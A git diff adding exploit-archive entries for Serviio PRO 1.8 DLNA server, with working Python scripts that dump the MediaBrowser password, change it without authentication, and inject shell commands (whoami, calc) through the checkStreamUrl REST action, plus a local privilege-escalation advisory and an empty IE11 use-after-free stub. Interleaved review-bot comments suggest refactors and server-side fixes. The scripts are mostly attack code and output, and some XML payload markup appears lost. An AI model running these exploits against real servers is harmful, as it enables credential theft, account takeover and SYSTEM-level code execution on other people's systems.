diff --git a/files.csv b/files.csv
index 21ff475381..4649d1afd9 100644
--- a/files.csv
+++ b/files.csv
@@ -5482,6 +5482,7 @@ id,file,description,date,author,platform,type,port
 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
 41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
+41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8967,6 +8968,7 @@ id,file,description,date,author,platform,type,port
 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
+41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37805,3 +37807,6 @@ id,file,description,date,author,platform,type,port
 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
 41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
 41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
+41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
+41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
+41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0
diff --git a/platforms/java/webapps/41958.py b/platforms/java/webapps/41958.py
new file mode 100755
index 0000000000..4a3cb4952f
--- /dev/null
+++ b/platforms/java/webapps/41958.py
@@ -0,0 +1,141 @@ +#!/usr/bin/env python +# +# +# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure +# +# +# Vendor: Petr Nejedly | Six Lines Ltd +# Product web page: http://www.serviio.org +# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 +# +# Summary: Serviio is a free media server. It allows you to stream your media +# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, +# games console or mobile phone) on your connected home network. +# +# Vendor: +# "Security: +# MediaBrowser (as well as any app that uses the API) uses well proven security techniques, +# so that you can be sure your content is only accessed by you. Make sure you keep your password +# secure." +# +# Desc: The version of Serviio installed on the remote Windows/Linux host is affected +# by an information disclosure vulnerability due to improper access control enforcement +# of the Configuration REST API. An unauthenticated, remote attacker can exploit this, +# via a specially crafted request, to gain access to potentially sensitive information. 
+# +# Tested on: Restlet-Framework/2.2 +# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5404 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php +# +# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094 +# +# +# 12.12.2016 +# + + +import sys +import xml.etree.ElementTree as ET +from urllib2 import Request, urlopen + +if (len(sys.argv) <= 2): + print '[*] Usage: serviio_id.py ' + print '[*] Example: serviio_id.py 10.211.55.3 23423' + exit(0) + +host = sys.argv[1] +port = sys.argv[2] + +headers = {'Accept': 'application/xml'} +request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers) +print '\nPrinting ServiioLinks:' +print '----------------------\n' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for URLs in roottree.iter('serviioLink'): + print URLs.text + +print + +headers = {'Accept': 'application/xml'} +#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers) +request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers) +print '\nPrinting directories:' +print '---------------------\n' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for URLs in roottree.iter('path'): + print URLs.text + +print + +headers = {'Accept': 'application/xml'} +request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers) +print '\nPrinting mediabrowser password:' +print '-------------------------------\n' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for URLs in roottree.iter('remoteUserPassword'): + print URLs.text + +print + + +''' +rewt@zslab:~# python serviio_id.py 10.211.55.3 23423 + +Printing 
ServiioLinks: +---------------------- + +serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml +serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl +serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource + + +Printing directories: +--------------------- + +/etc/apache2 +/etc/asl +/etc/cups +/etc/defaults +/etc/emond.d +/etc/mach_init.d +/etc/mach_init_per_login_session.d +/etc/mach_init_per_user.d +/etc/manpaths.d +/etc/newsyslog.d +/etc/openldap +/etc/pam.d +/etc/paths.d +/etc/periodic +/etc/pf.anchors +/etc/postfix +/etc/ppp +/etc/racoon +/etc/security +/etc/snmp +/etc/ssh +/etc/ssl +/etc/sudoers.d + + +Printing mediabrowser password: +------------------------------- + +s3cr3to + +rewt@zslab:~# +''' \ No newline at end of file diff --git a/platforms/java/webapps/41960.py b/platforms/java/webapps/41960.py new file mode 100755 index 0000000000..3d9755a025 --- /dev/null +++ b/platforms/java/webapps/41960.py 
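Review bot: The three request/parse/print sequences (`/rest/import-export/online`, `/rest/list-folders`, `/rest/remote-access`) repeat the same `headers = {'Accept': 'application/xml'}`, `Request(...)`, `urlopen(request).read()` and `ET.fromstring(...)` lines verbatim; a small helper taking the REST path and the element name to iterate would remove the duplication and make the `/etc`-vs-`C:\\` choice (currently a commented-out line) a parameter. The usage line `print '[*] Usage: serviio_id.py '` names no arguments although `len(sys.argv) <= 2` requires two, so a user who gets it wrong is told nothing about what to pass (the placeholders may have been dropped on this page as angle-bracket text). For defenders the sample output is the important part: the `remoteUserPassword` element is returned in clear text to an unauthenticated GET on the console port, so the mitigation is to keep that port off untrusted networks and to treat the MediaBrowser password as exposed on affected versions.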
@@ -0,0 +1,77 @@ +#!/usr/bin/env python +# +# +# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change +# +# +# Vendor: Petr Nejedly | Six Lines Ltd +# Product web page: http://www.serviio.org +# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 +# +# Summary: Serviio is a free media server. It allows you to stream your media +# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, +# games console or mobile phone) on your connected home network. +# +# Desc: The version of Serviio installed on the remote Windows/Linux host is affected +# by an unauthenticated password modification vulnerability due to improper access +# control enforcement of the Configuration REST API. A remote attacker can exploit this, +# via a specially crafted request, to change the login password for the mediabrowser protected +# page. +# +# Tested on: Restlet-Framework/2.2 +# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5407 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php +# +# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094 +# +# +# 12.12.2016 +# + + +import sys +import xml.etree.ElementTree as ET +from urllib2 import Request, urlopen + +if (len(sys.argv) <= 3): + print '[*] Usage: serviio_pwd.py ' + print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2' + exit(0) + +host = sys.argv[1] +port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424. 
+lozi = sys.argv[3] + +values = """ + + {0} + ORIGINAL + true + myserviio.dyndns.com +""" + +put = values.format(lozi) + +headers = { + 'Content-Type': 'application/xml', + 'Accept': 'application/xml' +} +request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers) +request.get_method = lambda: 'PUT' +response_body = urlopen(request).read() +roottree = ET.fromstring(response_body) + +for errorcode in roottree.iter('errorCode'): + print "\nReceived error code: "+errorcode.text + +print 'Password successfully changed to: '+lozi +print 'Go to: http://'+host+':23424/mediabrowser\n' diff --git a/platforms/windows/dos/41957.html b/platforms/windows/dos/41957.html new file mode 100755 index 0000000000..d0b82147ad --- /dev/null +++ b/platforms/windows/dos/41957.html @@ -0,0 +1,145 @@ + + + + + + + + + + + + + IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free + + + + + \ No newline at end of file diff --git a/platforms/windows/local/41959.txt b/platforms/windows/local/41959.txt new file mode 100755 index 0000000000..acb40253b8 --- /dev/null +++ b/platforms/windows/local/41959.txt 
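Review bot: `print 'Password successfully changed to: '+lozi` runs unconditionally, so when the server answers with an `errorCode` element the script prints both the error and a success message; set a flag inside the `for errorcode in roottree.iter('errorCode')` loop (or `sys.exit(1)` there) and print the success line only when no error was seen. The usage line `print '[*] Usage: serviio_pwd.py '` lists no argument names although `len(sys.argv) <= 3` requires three, matching the same gap in 41958.py. The `values` body as rendered here shows bare values (`{0}`, `ORIGINAL`, `true`, `myserviio.dyndns.com`) with no XML elements around them, which presumably is markup lost on this page rather than the committed payload; either way the header's claim that an unauthenticated PUT to `/rest/remote-access` changes the MediaBrowser password is the point a reader needs, and the fix on the server side is enforcing authentication on the configuration REST API.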
@@ -0,0 +1,66 @@
+Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
+
+
+Vendor: Petr Nejedly | Six Lines Ltd
+Product web page: http://www.serviio.org
+Affected version: 1.8.0.0 PRO
+
+Summary: Serviio is a free media server. It allows you to stream your media
+files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
+games console or mobile phone) on your connected home network.
+
+Desc: The application suffers from an unquoted search path issue impacting the service
+'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
+allow an authorized but non-privileged local user to execute arbitrary code with elevated
+privileges on the system. A successful attempt would require the local user to be able to
+insert their code in the system root path undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot. If successful, the
+local user’s code would execute with the elevated privileges of the application.
+
+Serviio also suffers from improper permissions which can be used by a simple authenticated user
+that can change the executable file with a binary of choice. The vulnerability exist due to the
+improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
+its sub-directories.
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2017-5405
+Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
+
+SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
+
+
+12.12.2016
+
+---
+
+
+C:\>sc qc Serviio
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Serviio
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Serviio
+ DEPENDENCIES : HTTP
+ SERVICE_START_NAME : LocalSystem
+
+C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
+C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\>
diff --git a/platforms/windows/webapps/41961.py b/platforms/windows/webapps/41961.py
new file mode 100755
index 0000000000..b6bcac65a1
--- /dev/null
+++ b/platforms/windows/webapps/41961.py
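Review bot: `Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php` uses the path segment `vulnerability/`, while the sibling advisories in this commit (ZSL-2017-5404, ZSL-2017-5407, ZSL-2017-5408) use `vulnerabilities/`; this looks like a typo in the URL and is worth confirming before the entry is indexed. The `sc qc` output shows `BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe` unquoted with a space in the path and `SERVICE_START_NAME : LocalSystem`, and the `icacls` output shows `BUILTIN\Users:(I)(F)` inherited on the service binary, which supports both findings in the description. The remediation is not stated and would help readers: quote the service binary path in the service registration, and remove Full control for the Users group from the install directory so only administrators can replace the binary. "The vulnerability exist" in the second paragraph should read "exists".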
@@ -0,0 +1,156 @@ +#!/usr/bin/env python +# +# +# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution +# +# +# Vendor: Petr Nejedly | Six Lines Ltd +# Product web page: http://www.serviio.org +# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 +# +# Summary: Serviio is a free media server. It allows you to stream your media +# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player, +# games console or mobile phone) on your connected home network. +# +# Desc: The version of Serviio installed on the remote Windows host is affected by +# an unauthenticated remote code execution vulnerability due to improper access control +# enforcement of the Configuration REST API and unsanitized input when FFMPEGWrapper +# calls cmd.exe to execute system commands. A remote attacker can exploit this with a +# simple JSON request, gaining system access with SYSTEM privileges via a specially +# crafted request and escape sequence. +# +# ================================================================================= +# org/serviio/ui/resources/server/ActionsServerResource.java: +# ----------------------------------------------------------- +# +# private ResultRepresentation checkStreamUrl(ActionRepresentation representation) { +# this.validateParameters(representation, 2); +# try { +# MediaFileType fileType = MediaFileType.valueOf(representation.getParameters().get(0)); +# String url = StringUtils.trim(representation.getParameters().get(1)); +# LocalItemMetadata md = MetadataFactory.getMetadataInstance(fileType); +# DeliveryContext context = fileType == MediaFileType.VIDEO ? 
new VideoDeliveryContext(false, null) : new AudioDeliveryContext(false, null); +# FFmpegMetadataRetriever.retrieveOnlineMetadata(md, url, context); +# return this.responseOk(); +# } +# catch (InvalidMediaFormatException e) { +# return this.responseOk(603); +# } +# +# ================================================================================= +# serviio.jar / external / ProcessExecutor.java: +# ---------------------------------------------- +# +# private Map createWindowsRuntimeEnvironmentVariables() { +# HashMap newEnv = new HashMap(); +# newEnv.putAll(System.getenv()); +# ProcessExecutorParameter[] i18n = new ProcessExecutorParameter[this.commandArguments.length + 2]; +# i18n[0] = new ProcessExecutorParameter("cmd"); +# i18n[1] = new ProcessExecutorParameter("/C"); +# for (int counter = 0; counter < this.commandArguments.length; ++counter) { +# ProcessExecutorParameter argument = this.commandArguments[counter]; +# String envName = "JENV_" + counter; +# i18n[counter + 2] = new ProcessExecutorParameter("%" + envName + "%"); +# boolean quotesNeededForWindows = this.quotesNeededForWindows(argument); +# if (!quotesNeededForWindows) { +# argument = new ProcessExecutorParameter(this.escapeAmpersandForWindows(argument.getValue())); +# } +# newEnv.put(envName, this.wrapInQuotes(argument, quotesNeededForWindows)); +# } +# this.commandArguments = i18n; +# String[] tempPath = FileUtils.splitFilePathToDriveAndRest(System.getProperty("java.io.tmpdir")); +# newEnv.put("HOMEDRIVE", tempPath[0]); +# newEnv.put("HOMEPATH", tempPath[1]); +# newEnv.putAll(this.createFontConfigRuntimeEnvironmentVariables()); +# if (log.isTraceEnabled()) { +# log.trace(String.format("Env variables: %s", newEnv.toString())); +# } +# return newEnv; +# } +# +# private String wrapInQuotes(ProcessExecutorParameter argument, boolean quotesNeeded) { +# return (quotesNeeded ? "\"" : "") + argument + (quotesNeeded ? 
"\"" : ""); +# } +# +# protected boolean quotesNeededForWindows(ProcessExecutorParameter argument) { +# boolean quotesNeeded = argument.getValue().indexOf(" ") > -1; +# return quotesNeeded; +# } +# +# private String escapeAmpersandForWindows(String value) { +# return value.replaceAll("&", "^&"); +# } +# +# ================================================================================= +# +# Tested on: Restlet-Framework/2.2 +# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8 +# Java/1.8.0_121 +# Java/1.8.0_111 +# Java/1.8.0_91 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2017-5408 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php +# +# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094 +# +# +# 12.12.2016 +# + + +# +# The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami +# output in it and start a calc.exe child process as nt authority\system. +# + +from urllib2 import Request, urlopen +import sys + +if (len(sys.argv) <= 1): + print '[*] Usage: serviio_rce.py ' + exit(0) + +host = sys.argv[1] + +values = """ + + checkStreamUrl + VIDEO + 1.2.3.4'\"`&whoami >testingus3.txt&&calc&`' +""" + +headers = { + 'Content-Type': 'application/xml', + 'Accept': 'application/xml' +} +request = Request('http://'+host+':23423/rest/action', data=values, headers=headers) + +response_body = urlopen(request).read() +print response_body + + +''' +Raw request: + +POST /rest/action HTTP/1.1 +Host: 10.211.55.3:23423 +Content-Length: 93 +Accept: application/json, text/plain, */* +Origin: http://10.211.55.3:23423 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Referer: http://10.211.55.3:23423/console/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +DNT: 1 +Connection: close + 
+{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]} + +'''
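Review bot: `Request('http://'+host+':23423/rest/action', data=values, headers=headers)` hard-codes the console port while the sibling scripts 41958.py and 41960.py take it from `sys.argv[2]`; accepting it as an optional argument with 23423 as the default keeps the three consistent. The `Raw request` block at the end sends `Content-Type: application/json;charset=UTF-8` with a JSON body while the script sends `application/xml`, which is fine if the API accepts both representations but should be said explicitly, especially since the `values` body as rendered here shows no XML elements (presumably markup lost on this page). The quoted `ProcessExecutor` code makes the root cause clear for readers: arguments are handed to `cmd /C` through `%JENV_n%` environment expansion, and the quoting and `^&` escaping decisions depend only on whether a space is present, so the durable server-side fix is to spawn ffmpeg without a shell and to validate the URL parameter in `checkStreamUrl` before it reaches the process layer, in addition to enforcing authentication on the configuration REST API.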